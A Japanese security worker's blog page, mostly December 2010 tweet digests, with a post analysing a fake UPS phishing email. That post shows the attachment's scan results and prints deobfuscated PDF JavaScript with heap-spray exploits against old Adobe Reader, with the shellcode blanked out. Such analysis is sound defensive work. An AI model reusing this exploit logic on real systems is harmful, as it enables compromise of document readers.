FC2ブログ

【お月様のある景色】心温まる夜

RIMG0820-1.jpg

先日の金曜日。九州関係者による集まり「ばってん会」。

久々に会う顔、いつも会う仲間だけど別の顔。多くの笑顔笑顔。

二次会の会場から出ると、雲の裏に月が輝いている。

影が早い。

雲が流れ、白く輝くお月様が。

空気が冷たく、澄んでいる。

心地よい風、心温もる夜。暮れゆく今年。

12/18のツイートまとめ

dry2

@nikolai_x メール送りました。宜しくお願いします。ビツグローブの方です。
12-18 17:14

ブログをアップしました。 12/17のツイートまとめ → http://am6.jp/gHZloh
12-18 09:01

12/17のツイートまとめ

dry2

フライドピクルス!! http://yfrog.com/h2g9usj
12-17 23:59

頼むバイ!!RT @7th_stable: がってん!RT @dry2: コラム。注意喚起。レポート。RT @7th_stable: しっかり組み立てれば、良いツールになる気がします。RT @shoutman0515: まだドラフト版 社内の何人かにラッコアプリが発見
12-17 23:26

鉄旅。良いね!!次回は。RT @yamasaka_m: 今日は行かれんばってん、つぎは飲み方は行きたいです? QT @dry2 終わった!これからバッテン。
12-17 23:25

ふーふー http://yfrog.com/gz2g1lj
12-17 23:24

よし!二次会!! http://yfrog.com/h49kuwj
12-17 23:18

バッテン会。場所は何処だろう??(笑)
12-17 21:13

こちらこそ、申し訳ありませんでした。今後も宜しくお願いします。RT @office_acer: @dry2 おつかれさまでした。DBSCワークショップに参加していたのですが、ご挨拶できず申し訳ありません。
12-17 21:08

ありがとうございました。突然の振りにも関わらずありがとうございました。RT @HarutoJ: @dry2 お疲れ様でした。締めの挨拶しておきました(^_-)
12-17 21:05

終わった!これからバッテン。
12-17 20:57

冒険は?RT @odayan3: @dry2 最近なんとか生きてます!極貧生活っす(´Д` )
12-17 19:20

続きを読む

12/15のツイートまとめ

dry2

お食事 http://yfrog.com/gzgvobj
12-15 19:45

がんばって!というより、楽しんで!かな。 QT @yamasaka_m: とりあえず今日のところは青森まで行く予定でいます!青森まで普通電車なので、到着は夜になります @yamasaka_m: http://bit.ly/e6WJlQ いわき駅なう。常磐線経由で北上中。
12-15 11:30

満員御礼のようだ。 http://yfrog.com/h031873367j
12-15 11:27

内部留保→資産運用→円高→海外に吸い取られ→じり貧 RT @Crossing_the_T: 法人税率5%引き下げ→内部留保→雇用安定と行くだろうか?社員、株主へ還元が3位だとか。
12-15 09:48

おお!!どこまでかな?RT @yamasaka_m: http://twitpic.com/3fzoh0 いわき駅なう。常磐線経由で北上中。
12-15 09:44

ブログをアップしました。 12/14のツイートまとめ → http://am6.jp/e6Xcfv
12-15 09:01

赤坂サカスだったか。サカサだと思ってた。(笑) サカスだったら「赤坂で咲かす」だったな。(爆) QT @dry2: きゆつはのかさかあ。 http://yfrog.com/gz65prsj
12-15 07:43

ニヤリ! RT @cchanabo: ひこざ? RT @dry2: へへへ
12-15 01:16

へへへ
12-15 00:46

12/14のツイートまとめ

dry2

きゆつはのかさかあ。 http://yfrog.com/gz65prsj
12-14 21:58

アンドロイドは? QT @hiropooh: w QT @risa_ozaki QT @makeplex : 海上自衛隊が本気出してるw 「海上自衛隊入隊体験iPhoneアプリ」。みんなで敬礼しまくろう。無駄にかっこいいよ。 http://bit.ly/eMJ93E
12-14 19:13

17日のDBSCセミナーの資料。作らなきゃ。ネタ満載だけど。どれにしようかな。 http://bit.ly/gmks20
12-14 18:45

問題作成ちう?? QT @twohno: RT @tacozzy 僅かに情報流出の痕が見受けられます。 @ishinya @twohno 「折り紙」... RT @twohno 折り紙でバラを作りました http://bit.ly/g4Vjkw
12-14 18:41

ブログをアップしました。 12/13のツイートまとめ → http://am6.jp/f1Vz8l
12-14 13:29

日本のアップルに解決能力が有るのか見守りたい。 http://www.jiji.com/jc/c?g=soc&k=2010121400368&j1
12-14 13:27

ガラパゴスの企業内使用は認めるのだろうか?
12-14 12:37

爆! QT @ChoichiHasegawa: 首から社員証と客先の入館証を下げ、業務用と書かれた携帯電話で、関係者外秘と書かれた資料を広げて、公共の場で通話するビジネスマン。実に素晴らしい光景であった。
12-14 11:34

全くだ。winyの利用目的とp2p技術の利用目的を混同している。RT @ttaizo: 違法は良くないがJASRACの強引さも目立つ今日この頃。P2P技術=良く無いもの、の、構図はどうにかして欲しい。 http://bit.ly/h3Rot6
12-14 09:56

12/13のツイートまとめ

dry2

まじ、見逃した!! @ChoichiHasegawa @cchanabo @dai1701 @dry2
12-13 23:47

会議終え 氷雨に耐える タワーかな http://yfrog.com/h0ieqfaj
12-13 18:04

どういたしまして!RT @yhitme: JIPDECの委員会。@dry2 さんにラッコタオルとラッコカレンダーいただきました。at 機械振興会館. http://4sq.com/dolGTJ
12-13 17:58

. @shita @cchanabo 今晩のWBSです。何事もなければ。likiweaks??(笑)
12-13 12:12

テレ東 撮影ちう。
12-13 11:56

ブログをアップしました。 【今日のウイルスメール】久々に → http://am6.jp/hkUypi
12-13 10:43

ブログをアップしました。 12/11のツイートまとめ → http://am6.jp/ewge7j
12-13 10:27

ブログをアップしました。 12/12のツイートまとめ → http://am6.jp/h610gn
12-13 10:27

12/12のツイートまとめ

dry2

誰か大きな絵を描いているのだろうか? http://sankei.jp.msn.com/world/america/101212/amr1012121201006-n1.htm 米金融界に巨大インサイダー疑惑浮上
12-12 16:09

良い天気! http://yfrog.com/h4a10rj
12-12 08:55

そう言えば、先日乗ったwifiタクシー http://yfrog.com/gyj7syj
12-12 08:52

出動!
12-12 08:15

12/11のツイートまとめ

dry2

なんで柚子胡椒。 RT @Akira_Murakami: ホタテ、柚子胡椒。これはまいう http://twitpic.com/3ewnzs
12-11 20:34

謝志会そろそろ終わり。 (@ アーリーズテラス) http://4sq.com/9ZpS8M
12-11 20:22

景品のひとつ、版画。 http://yfrog.com/h33p5yj
12-11 20:14

良く飲んでる。 http://yfrog.com/gzod5kj
12-11 20:12

謝志会ちう。 http://yfrog.com/gyeyhjj
12-11 19:06

今日は撤収119。これから謝志会忘年会。
12-11 18:13

ブログをアップしました。 12/10のツイートまとめ → http://am6.jp/gPVEWy
12-11 09:01

【今日のウイルスメール】久々に

件名
2nd attempt at Delivery

本文
Hi,
We attempted to deliver your order today but we are having problem with your delivery address.Please check the attached invoice in pdf in order to reconfirm your delivery address
Regards,
UPS Customer Service

添付ファイル
invoice.pdf

MD5: 09b6fe36cec138e0aa90a358c7c79eb4
Date first seen: 2010-12-10 08:10:49 (UTC)
Date last seen: 2010-12-10 08:10:49 (UTC)
Detection ratio: 15/43
ウイルスチェック結果
Antivirus Version Last update Result
AhnLab-V3 2010.12.10.00 2010.12.09 -
AntiVir 7.10.14.244 2010.12.09 HTML/Malicious.PDF.Gen
Antiy-AVL 2.0.3.7 2010.12.10 -
Avast 4.8.1351.0 2010.12.10 JS:Pdfka-gen
Avast5 5.0.677.0 2010.12.10 JS:Pdfka-gen
AVG 9.0.0.851 2010.12.10 -
BitDefender 7.2 2010.12.10 -
CAT-QuickHeal 11.00 2010.12.10 -
ClamAV 0.96.4.0 2010.12.10 PUA.PDF.RunJS
Command 5.2.11.5 2010.12.10 PDF/Obfusc.F!Camelot
Comodo 7010 2010.12.10 -
DrWeb 5.0.2.03300 2010.12.10 -
Emsisoft 5.1.0.1 2010.12.10 -
eSafe 7.0.17.0 2010.12.09 PDF.Exploit.1
eTrust-Vet 36.1.8032 2010.12.10 PDF/Pidief!generic
F-Prot 4.6.2.117 2010.12.09 -
F-Secure 9.0.16160.0 2010.12.10 -
Fortinet 4.2.254.0 2010.12.09 -
GData 21 2010.12.10 JS:Pdfka-gen
Ikarus T3.1.1.90.0 2010.12.10 -
Jiangmin 13.0.900 2010.12.10 -
K7AntiVirus 9.71.3200 2010.12.09 -
Kaspersky 7.0.0.125 2010.12.10 -
McAfee 5.400.0.1158 2010.12.10 Exploit-PDF.q.gen
McAfee-GW-Edition 2010.1C 2010.12.09 Exploit-PDF.q.gen
Microsoft 1.6402 2010.12.10 Exploit:Win32/Pdfjsc.G
NOD32 5690 2010.12.10 PDF/Exploit.Pidief.OJS.Gen
Norman 6.06.12 2010.12.10 -
nProtect 2010-12-10.01 2010.12.10 -
Panda 10.0.2.7 2010.12.09 Exploit/PDF.Gen.B
PCTools 7.0.3.5 2010.12.10 -
Prevx 3.0 2010.12.10 -
Rising 22.77.03.06 2010.12.10 -
Sophos 4.60.0 2010.12.10 Sus/PDFJs-Q
SUPERAntiSpyware 4.40.0.1006 2010.12.10 -
Symantec 20101.3.0.103 2010.12.10 -
TheHacker 6.7.0.1.097 2010.12.09 -
TrendMicro 9.120.0.1004 2010.12.10 -
TrendMicro-HouseCall 9.120.0.1004 2010.12.10 -
VBA32 3.12.14.2 2010.12.09 -
VIPRE 7585 2010.12.10 Exploit.PDF-JS.Gen (v)
ViRobot 2010.12.10.4193 2010.12.10 -
VirusBuster 13.6.84.1 2010.12.09 -
MD5: 09b6fe36cec138e0aa90a358c7c79eb4
SHA1: 09ece8e33025c89b9e77fb94abf3c33efaaf6b50
SHA256: c9ae3e21b1d1c5e40dae4f19c3e114467720e8f954e6150370cb713aca338397
File size: 11582 bytes
Scan date: 2010-12-10 08:10:49 (UTC)


で、PDFに埋め込まれているJAVAスクリプトは難読化されている。解いてみると大体以下のような感じ、バージョン調べてそれに合わせて実行している。

function x35C2M(){
function fix_it(yarsp, len){
while (yarsp.length * 2 < len){
yarsp += yarsp;
}
yarsp = yarsp.substring(0, len/2);
return yarsp;
}

function util_printf(){
var payload = unescape("hogehoge");
var nop = unescape("")
var heapblock = nop + payload;
var bigblock = unescape("");
var headersize = 20;
var spray = headersize + heapblock.length;
while (bigblock.length < spray){
bigblock += bigblock;
}
var fillblock = bigblock.substring(0, spray);
var block = bigblock.substring(0, bigblock.length-spray);
while (block.length+spray < 0x40000){
block = block + block + fillblock;
}
var mem_array = new Array();
for (var i = 0; i < 1400; i++){
mem_array[i] = block + heapblock;
}
var num =
12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
util.printf("E000f", num);
}

function collab_email(){
var shellcode = unescape("hogehoge");
var mem_array = new Array();
var cc = 0x0c0c0c0c;
var addr = 0x400000;
var sc_len = shellcode.length * 2;
var len = addr - (sc_len+0x38);
var yarsp = unescape("hogehoge");
yarsp = fix_it(yarsp, len);
var count2 = (cc - 0x400000)/addr;
for (var count = 0; count < count2; count++){
mem_array[count] = yarsp + shellcode;
}
var overflow = unescape("hogehoge");
while (overflow.length < 44952){
overflow += overflow;
}
this.collabStore = Collab.collectEmailInfo({subj: "",msg: overflow});
}

function collab_geticon(){
if (app.doc.Collab.getIcon){
var arry = new Array();
var vvpethya = unescape("hogehoge");
var hWq500CN = vvpethya.length * 2;
var len = 0x400000 - (hWq500CN + 0x38);
var yarsp = unescape("hogehoge");
yarsp = fix_it(yarsp, len);
var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
arry[vqcQD96y] = yarsp + vvpethya;
}
var tUMhNbGw = unescape(" ");
while (tUMhNbGw.length < 0x4000){
tUMhNbGw += tUMhNbGw;
}
tUMhNbGw = "N." + tUMhNbGw;
app.doc.Collab.getIcon(tUMhNbGw);
}
}

function newplayer(){
var SH = unescape("hogehoge");
var oDQvB = unescape("hogehoge");
var rffMwoiLDYsFNdKcPazkQfo = unescape("hogehoge");
while(oDQvB.length <= 32768) oDQvB+=oDQvB;
oDQvB=oDQvB.substring(0,32768 - SH.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= oDQvB + SH;}
util.printd("hogehoge", new Date());
util.printd("hogehoge", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(rffMwoiLDYsFNdKcPazkQfo, new Date());
}

function pdf_start(){
var version=app.viewerVersion.toString();
version=version.replace(/\D/g,'');
var ver_array=new Array(version.charAt(0),version.charAt(1),version.charAt(2));

if((ver_array[0]<8)||(ver_array[0]==8&&ver_array[1]<2&&ver_array[2]<2)) {
collab_email();
}

if((ver_array[0]==8&&ver_array[1]<1&&ver_array[2]<3)||(ver_array[0]==9&&ver_array[1]<1)){
collab_geticon();
}

if((ver_array[0]==8&&ver_array[1]<2)|| (ver_array[0]==9&&ver_array[1]<3)){
newplayer();
}
}

12/10のツイートまとめ

dry2

HTCとTABはHomeとMenuが逆。その為良く間違えていたが最近間違えない。場所ではなくマークを認知しだした。不思議。 QT @ymzkei5: Android、フリーダム過ぎるw>■Androidの分断化問題がよく分かる一枚の写真 http://engt.co/evPyBQ
12-10 12:44

ブログをアップしました。 12/09のツイートまとめ → http://am6.jp/foJmaS
12-10 09:06

ブログをアップしました。 12/08のツイートまとめ → http://am6.jp/hj4kzn
12-10 09:06

何故感染?感染するとどうなる? QT @itssay2: Twitterに新しいワーム。ツイートに短縮URLのみが表示されているツイートのリンクをクリックすると、感染。短縮URLしか表示されていないツイートを見かけたら、安易にクリックしないで下さいね。
12-10 08:43

12/09のツイートまとめ

dry2

どうやって検出?それが意味があるのだろうか? RT @asiacooper: Lookout Mobile Security FREE 4.8.3がメジャーらしいデスw http://bit.ly/h0HRR5 RT @dry2: Android向けウイルス対策ソフトって、、、
12-09 23:15

Android向けウイルス対策ソフトって、、、一応、出しておかなければ、という感じなのかなぁ。
12-09 23:04

赤面男子! QT @bakusei: dry2 「セキュリティ女子」に対抗するのは「イクメン」ならぬ「セキュメン」?(赤面)
12-09 22:44

KとFは誰だと社内騒然。
12-09 18:05

lsccoアプリがいた。
12-09 08:59

おめでとうございます! QT @asiacooper: おめでとうございます?(^o^)/ RT cramoty: 無事に産まれました。 元気な女の子です。 いろいろ応援してくださった皆様、ありがとうございました。 とりあえずのツイートまで
12-09 08:32

17日です。dmします。
12-09 06:55

12/08のツイートまとめ

dry2

androidで動くiPhoneはないと思いますが、iPhoneで動くandroidは有り得るのでは? RT @akibaryu: 何に使うのかと思ったら2in1なんだ。AndroidとiPhoneが動くとかは、まあないか RT @connect24h: RT @dry2:...
12-08 23:38

そのとおりす!わっはっは! RT @mataebara: @dry2 @twohno ということは、この後に、バッテン会なんですね。ん。暴走したままか・・・・・。参加してみるかな・・・・。
12-08 23:36

もしどらじゃなくぼうどらのぼうそうか。(笑) RT @twohno: 某ドラ氏の暴走にも期待してます RT @dry2 東京電機大学の安田浩先生とS&Jの三輪信雄さんのパネルディスカッションも見もの。懇親会付き2千円 http://bit.ly/gmks20
12-08 23:09

6年彷徨のあかつきには!
12-08 23:06

wikileaksのミラーサイト。日本にもあるが、法的にテイクダウン出来るのだろうか?サイトを立てた人間は何か法律違反しているのだろうか?著作権法違反?
12-08 22:57

データベースセキュリティコンソーシアム特別ワークショップ。 講演も良いですが、東京電機大学の安田浩先生とS&Jの三輪信雄さんのパネルディスカッションも見もの。懇親会付き2千円 http://bit.ly/gmks20
12-08 22:30

wyse pocket cloud 真面目にやってほしい。日本語がまるでだめお。やる気ないんだろうな。
12-08 12:51

ブログをアップしました。 12/07のツイートまとめ → http://am6.jp/gQW4aK
12-08 09:00

プロフィール

どらいつ 家主:どらいつ

情報セキュリティ会社勤務。13年前からタバコを止めたが禁煙はしてない。ダイエットとリバウンドの繰り返し。


1958年 北九州市生まれ。大原小学校、池田小学校、香月中学、北九州予備校、東筑高校、熊本大学土木科(中退)、1984年就職、現在にいたる。

中学時は水泳部。部内で平泳ぎ 4位(4人中)。高校・大学時代9年間はラグビー。ポジションはフッカー。当時に今の体重があれば、、

ツイッター(Twitter) dry2
つぶやきログ(Twilog) dry2
日経電子版コラム
日経BP連載
グーグル+写真アルバム
フォト蔵 dry2

最新記事
最新コメント
カテゴリ
RSS
どらいつのお気に入り